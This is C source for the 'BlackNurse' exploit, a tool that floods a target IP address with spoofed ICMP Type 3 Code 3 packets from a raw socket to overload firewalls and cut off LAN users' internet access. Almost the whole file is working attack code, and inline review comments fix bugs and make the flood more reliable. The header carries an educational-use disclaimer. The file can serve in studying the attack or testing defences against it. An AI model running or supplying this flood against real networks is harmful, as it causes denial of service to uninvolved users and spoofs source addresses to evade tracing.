/**
* Black Nurse Exploit
*
* by opsxcq (github.com/opsxcq)
* this flaw was discovered by Kenneth B. Jørgensen and Lenny Hansson.
*
* Blacknurse is a low bandwidth ICMP attack that is capable of doing denial of service to well known
* firewalls. Most ICMP attacks that we see are based on ICMP Type 8 Code 0 also called a ping flood
* attack. BlackNurse is based on ICMP with Type 3 Code 3 packets. We know that when a user has allowed
* ICMP Type 3 Code 3 to outside interfaces, the BlackNurse attack becomes highly effective even at low
 * bandwidth. "Low bandwidth" here means roughly 15-18 Mbit/s, which is what it takes to reach the
 * required packet rate of about 40 to 50K packets per second. It does not matter if you have a 1 Gbit/s Internet
* connection. The impact we see on different firewalls is typically high CPU loads. When an attack is
* ongoing, users from the LAN side will no longer be able to send/receive traffic to/from the Internet.
* All firewalls we have seen recover when the attack stops.
*
 * This program is for educational purposes ONLY. Do not use it against systems without explicit permission.
 * The usual disclaimer applies, in particular that the author (opsxcq) is not liable for any damages
 * caused by direct or indirect use of the information or functionality provided by this program.
 * Neither the author nor any Internet provider bears responsibility for the content or misuse of this program
 * or any derivatives thereof. By using this program you accept that any damage (data loss,
 * system crash, system compromise, etc.) caused by its use is not opsxcq's responsibility.
*
**/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#define PAYLOAD_SIZE 512 /* bytes of filler appended after the ICMP header in every packet sent */
typedef unsigned char u8; /* NOTE(review): u8 and u16 are defined but not referenced anywhere in this file */
typedef unsigned short int u16;
/*
 * Internet checksum over nbytes of memory starting at ptr: the one's-complement
 * sum of the data taken as 16-bit words, with a trailing odd byte padded by a
 * zero byte, then complemented. The words are read in host order and the
 * result is returned in host order too, so the caller can store it straight
 * into the header field (the byte pattern in memory is the same either way).
 *
 * ptr:    start of the region to sum (caller must point at 16-bit aligned data)
 * nbytes: number of bytes to cover; a value below 1 yields 0xffff
 */
unsigned short icmpChecksum(unsigned short *ptr, int nbytes){
    unsigned long total = 0;
    int remaining = nbytes;

    /* Accumulate whole 16-bit words. */
    for (; remaining > 1; remaining -= 2) {
        total += *ptr++;
    }

    /* A leftover byte is treated as a word whose other byte is zero. */
    if (remaining == 1) {
        unsigned short last = 0;
        unsigned char *first_byte = (unsigned char *) &last;
        *first_byte = *(unsigned char *) ptr;
        total += last;
    }

    /* Fold the carries out of the low 16 bits back in; the first fold can
     * itself produce a carry, hence the second addition. */
    total = (total >> 16) + (total & 0xffff);
    total += total >> 16;

    return (unsigned short) ~total;
}
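/**
 * Program entry point: floods <target> with hand-built ICMP Type 3 Code 3
 * (destination unreachable / port unreachable) datagrams from a raw socket
 * until the process is killed or a send fails.
 *
 * Usage: exploit <target-ipv4-address>
 *
 * Opening the raw socket needs CAP_NET_RAW (normally root). The source
 * address is a random value rather than this host's address, so the packets
 * only leave the local network if nothing filters spoofed sources on the way
 * out (BCP 38 egress filtering drops every one of them). Use only against
 * systems you are explicitly authorised to test.
 *
 * Returns -1 on any error (bad arguments, socket setup, allocation, or a
 * failed send). The send loop has no normal exit.
 */
int main(int argc, char **argv){
    printf("[+] Black Nurse exploit\n");
    /* argv[1] is used below, so two entries are required: the old `argc < 1`
     * test could never fire and a missing argument dereferenced NULL. */
    if (argc < 2){
        printf("[-] Missing argument, target\n");
        printf(" Usage: %s <target>\n", argv[0]);
        return -1;
    }

    int sockfd = -1;
    char *packet = NULL;
    int option = 1;

    /* Seed once so the spoofed source, IP id and payload differ between runs;
     * rand() without srand() produces the same sequence every time. */
    srand((unsigned) time(NULL) ^ (unsigned) getpid());

    /* Parse the target. inet_pton() reports malformed input, whereas
     * inet_addr() silently returned INADDR_NONE (255.255.255.255). */
    struct in_addr target_addr;
    if (inet_pton(AF_INET, argv[1], &target_addr) != 1){
        printf("[-] Invalid IPv4 target: %s\n", argv[1]);
        return -1;
    }
    in_addr_t target = target_addr.s_addr;

    /* Spoofed source address: whatever rand() yields, truncated to 32 bits. */
    in_addr_t source = (in_addr_t) rand();

    /* Raw socket on which we supply the IP header ourselves. */
    sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sockfd < 0){
        perror("[-] Can't create socket, are you root ?");
        goto out;
    }
    if (setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &option, sizeof option) == -1){
        perror("[-] Can't set socketopts IP_HDRINCL (to set custom options on IPV4 layer)");
        goto out; /* the original returned here without closing sockfd */
    }
    /* Lets a broadcast address be used as the target. */
    if (setsockopt(sockfd, SOL_SOCKET, SO_BROADCAST, &option, sizeof option) == -1){
        perror("[-] Can't set socketopts for broadcast");
        goto out;
    }

    /* IPv4 header + ICMP header + fixed payload; calloc() zeroes it all. */
    size_t finalPacketSize = sizeof(struct iphdr) + sizeof(struct icmphdr) + PAYLOAD_SIZE;
    packet = calloc(1, finalPacketSize);
    if (!packet){
        perror("[-] Cannot allocate memory, if you never got this error before, you are lucky !");
        goto out;
    }
    struct iphdr *ip = (struct iphdr *) packet;
    struct icmphdr *icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));
    unsigned char *payload = (unsigned char *) icmp + sizeof(struct icmphdr);

    /* IPv4 header. ip->check is left at 0: on Linux the kernel computes it
     * for IP_HDRINCL sockets (raw(7)). NOTE(review): confirm before porting
     * to BSD, which also expects tot_len in host rather than network order. */
    ip->version = 4;
    ip->ihl = 5;
    ip->tos = 0;
    ip->tot_len = htons((unsigned short) finalPacketSize);
    ip->id = (unsigned short) rand();
    ip->frag_off = 0;
    ip->ttl = 255;
    ip->protocol = IPPROTO_ICMP;
    ip->saddr = source;
    ip->daddr = target;

    /* ICMP header: Type 3 (destination unreachable); the code is set in the
     * loop. The four bytes after the checksum are "unused" for Type 3
     * messages (RFC 792 says zero); they are filled with random values here,
     * as the original did. */
    icmp->type = ICMP_DEST_UNREACH;
    icmp->code = 0;
    icmp->un.echo.sequence = (unsigned short) rand();
    icmp->un.echo.id = (unsigned short) rand();
    icmp->checksum = 0; /* recomputed for every packet below */

    /* Destination for sendto(); port and padding stay zero. */
    struct sockaddr_in sockAddress = {
        .sin_family = AF_INET,
        .sin_addr.s_addr = target,
    };

    puts("[+] Sending packets\n");
    unsigned long sent = 0; /* was uninitialised before, so the counter started at garbage */

    /* Let the packet storm begin ! */
    while (1){
        icmp->code = ICMP_PORT_UNREACH; /* code 3: the BlackNurse trigger */
        memset(payload, rand() % 255, PAYLOAD_SIZE);
        /* The checksum covers ICMP header + payload and must be 0 while summed. */
        icmp->checksum = 0;
        icmp->checksum = icmpChecksum((unsigned short *) icmp, (int)(sizeof(struct icmphdr) + PAYLOAD_SIZE));
        ssize_t sentSize = sendto(sockfd, packet, finalPacketSize, 0, (struct sockaddr *) &sockAddress, sizeof sockAddress);
        if (sentSize < 0 || (size_t) sentSize != finalPacketSize){
            perror("[-] Packet send failed"); /* perror() appends its own newline */
            goto out;
        }
        printf("[+] Already sent %lu packets\r", ++sent);
        fflush(stdout);
    }

out:
    /* Only reached on error; every resource is released on each exit path. */
    free(packet);
    if (sockfd >= 0) close(sockfd);
    return -1;
}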